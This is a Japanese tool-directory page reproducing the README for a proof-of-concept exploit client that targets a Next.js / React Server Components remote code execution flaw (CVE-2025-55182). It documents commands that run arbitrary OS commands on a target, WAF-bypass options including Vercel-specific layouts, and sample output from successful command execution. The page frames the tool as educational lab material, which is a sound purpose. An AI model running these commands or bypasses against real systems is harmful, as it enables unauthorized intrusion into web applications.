Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
react2shell-scanner — RSC/Next.js リモートコード実行脆弱性 (CVE-2025-55182, CVE-2025-66478) の高精度検出 | Kitploit
ツール/GitHubGitHub/hidden-investigations/react2shell-scanner
脆弱性スキャナーエクスプロイトウェブアプリケーション悪用WAFバイパスペネトレーションテスト学習と教育
GitHubhidden-investigations/react2shell-scanner

react2shell-scanner

RSC/Next.js リモートコード実行脆弱性 (CVE-2025-55182, CVE-2025-66478) の高精度検出

リポジトリを見るウェブサイト
547ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

React2Shell Scanner – PoC付き

CVE-2025-55182 – React Server Components RCE PoC
Hidden Investigations React2Shell ラボ向けの教育用エクスプロイトクライアント。

このリポジトリには、React Server Components / Next.js アプリケーションの設定ミスを標的とした React2Shell 脆弱性 (CVE-2025-55182) のシングルホスト向け概念実証 (PoC) エクスプロイトツールが含まれています。

本ツールは、公式の Hidden Investigations React2Shell ラボ または明示的に所有・管理しているシステムに対してのみ使用するように設計されています。


⚠️ 法的・倫理的免責事項

このプロジェクトは教育目的および防御的なセキュリティ研究のためにのみ提供されます。

  • 本ツールは以下のものにのみ使用してください:
    • 公式の Hidden Investigations React2Shell ラボ、または
    • 所有している、または明示的な書面による許可を得たシステム。
  • ランダムなWebサイト、本番システム、自分が管理していないインフラストラクチャには使用しないでください。
  • 作者およびHidden Investigationsは、誤用または損害について一切の責任を負いません。

本ツールを使用することにより、適用されるすべての法律および規制に従うことに同意したものとみなします。


機能

  • 🔥 React2Shell エクスプロイトクライアント (CVE-2025-55182 向け)
  • 🎯 シングルホスト専用 (マススキャンなし)
  • 📡 カスタムパスおよびパスリストのサポート
  • 🧪 セーフチェックモード (OSコマンドなし、検出プローブのみ)
  • 🪟 Windows対応モード (デフォルトで whoami)
  • 🛡️ WAF回避ヘルパー:
    • ジャンクマルチパートフィールド (--waf-bypass, --waf-bypass-size)
    • Vercel レイアウト調整 (--vercel-waf-bypass)
  • 🔐 TLSオプション (--insecure, カスタムヘッダー)
  • 🧾 JSON出力 (-o/--output, --all-results)
  • 🧘 クリーンなクワイエットモード出力 (他のツールへのパイプに最適)

  • 必要要件

    • Python: 3.8以上 (Python 3.10以上でテスト済み)
    • 依存関係:
      • requests

    依存関係のインストール:

    root@kitploit:~
    pip install -r requirements.txt
    

    インストール

    1. Hidden Investigations のリポジトリをクローン:
    root@kitploit:~
    git clone https://github.com/hidden-investigations/react2shell-poc.git
    cd react2shell-poc
    
    1. (任意ですが推奨) 仮想環境を作成:
    root@kitploit:~
    python3 -m venv venv
    source venv/bin/activate   # On Windows: venv\Scripts\activate
    
    1. 依存関係をインストール:
    root@kitploit:~
    pip install -r requirements.txt
    
    1. ツールを実行:
    root@kitploit:~
    python3 react2shell-scanner.py -h
    

    使い方

    基本的なヘルプ:

    root@kitploit:~
    python3 react2shell-scanner.py -h
    

    ツールにはターゲットURLが必要です:

    root@kitploit:~
    python3 react2shell-scanner.py -t http://localhost:3000 -c "id"
    # or
    python3 react2shell-scanner.py --url http://localhost:3000 -c "id"
    

    -t/--target または -u/--url を指定せずに実行すると、ブランド付きのヘルプメッセージを表示して終了します。


    コマンドラインオプション

    ターゲットとパス

    OptionDescriptionDefault
    -t, --targetターゲットURLまたはドメイン (--url が使用されない場合は必須)None
    -u, --url--target のエイリアス (Assetnoteスタイルのフラグ)None
    --pathテストするパス (複数回使用可能、例: /, /_next)/
    --path-fileテストするパスが含まれるファイル (1行に1パス)None

    注: このPoCはシングルホスト専用です。-l/--list オプションは存在しますが、意図的に無効化されています。


    エクスプロイト/ペイロードの動作

    OptionDescriptionDefault
    -c, --commandターゲットで実行するコマンド (エクスプロイト成功時)id
    --safe-checkSAFE_CHECK ペイロードを使用する (OSコマンドなし、単なるマーカー文字列)off
    --windowsWindowsターゲット用にデフォルトを調整する (例: コマンドが id の場合は whoami を使用)off
    --waf-bypassWAF回避のため、リクエストボディに大きなジャンクマルチパートフィールドを追加するoff
    --waf-bypass-size KB--waf-bypass 使用時のジャンクフィールドのサイズ (KB)128
    --vercel-waf-bypassVercel WAFの動作を調整するための代替マルチパートレイアウトを使用する (簡易PoC)off

    HTTP / TLSオプション

    OptionDescriptionDefault
    --timeout SECONDSリクエストタイムアウト (秒)15 (または --waf-bypass 使用かつタイムアウト未設定の場合は 20)
    -k, --insecureSSL検証を無効にする (curl -k と同様)off
    -H, --headerカスタムヘッダー、例: -H "X-Forwarded-For: 127.0.0.1" (繰り返し可能)None

    出力/UXオプション

    OptionDescriptionDefault
    -o, --output FILEJSON結果を FILE に書き込むNone
    --all-results--output 使用時に、脆弱でない結果も含めるoff
    -v, --verbose冗長モード – HTTPステータスと X-Action-Redirect ヘッダーを表示off
    -q, --quietクワイエットモード – 成功時に正規化されたコマンド出力のみを表示off
    --no-colorカラー端末出力を無効にするoff

    クワイエットモードの例 (きれいな複数行出力):

    root@kitploit:~
    python3 react2shell-scanner.py --url http://localhost:3000 -q -c "ls -la"
    

    出力:

    root@kitploit:~
    total 12
    drwxr-xr-x    1 root     root            10 Dec 13 21:13 .
    drwxr-xr-x    1 root     root             0 Dec 13 21:13 ..
    drwxr-xr-x    1 nextjs   nodejs          12 Dec 13 21:13 .next
    drwxr-xr-x    1 nextjs   nodejs         396 Dec 13 21:13 node_modules
    -rw-r--r--    1 nextjs   nodejs         733 Dec 13 21:13 package.json
    drwxr-xr-x    1 root     root            12 Dec 13 19:13 public
    -rw-r--r--    1 nextjs   nodejs        5661 Dec 13 21:13 server.js
    

    バルクスキャンフラグ (意図的に無効化)

    以下のフラグはAssetnoteのCLIを模倣するために存在しますが、マススキャンの悪用を避けるためにこのPoCでは実装されていません:

    OptionStatus
    -l, --list未実装
    --threads N未実装

    -l/--list を使用すると、ツールは警告を表示して終了し、大規模な安全なスキャンにはAssetnoteのオリジナルの react2shell-scanner を使用するよう提案します。


    使用例

    ローカルラボに対して実行:

    root@kitploit:~
    python3 react2shell-scanner.py --url http://localhost:3000 -c "whoami"
    

    より大きなジャンクフィールドでWAF回避を使用:

    root@kitploit:~
    python3 react2shell-scanner.py -t http://localhost:3000   --waf-bypass --waf-bypass-size 256   -c "id"
    

    同じホスト上の複数パス:

    root@kitploit:~
    python3 react2shell-scanner.py -t http://localhost:3000   --path /   --path /_next/data   -c "id"
    

    ファイルからのパス:

    root@kitploit:~
    python3 react2shell-scanner.py -t http://localhost:3000   --path-file paths.txt   -c "id"
    

    セーフチェックモード (OSコマンドは実行されない):

    root@kitploit:~
    python3 react2shell-scanner.py -t http://localhost:3000 --safe-check
    

    結果のJSON出力をファイルに保存:

    root@kitploit:~
    python3 react2shell-scanner.py -t http://localhost:3000   --path / --path /_next   -c "id"   -o results.json --all-results
    

    JSON出力形式

    -o/--output が使用されると、ツールは以下のようなオブジェクトの配列を書き込みます:

    root@kitploit:~
    [
      {
        "url": "http://localhost:3000/",
        "path": "/",
        "success": true,
        "status": "success",
        "output": "uid=1000(nextjs) gid=1000(nodejs) groups=1000(nodejs)",
        "http": {
          "status_code": 302,
          "headers": {
            "X-Action-Redirect": "NEXT_REDIRECT;push;/login?a=uid%3D1000%28nextjs%29;307;",
            "...": "..."
          }
        }
      }
    ]
    

    クレジットと謝辞

    • Hidden Investigations – React2Shell教育ラボとPoCクライアントの公開に対して。
    • @sakibulalikhan – ツール作者。
    • Assetnote – 彼らの react2shell-scanner によるWAF回避アイデアのインスピレーション。

    ライセンス

    このプロジェクトは MITライセンス の下でライセンスされています。詳細は LICENSE を参照してください。

    📬 お問い合わせ: [email protected]

    ツールをダウンロード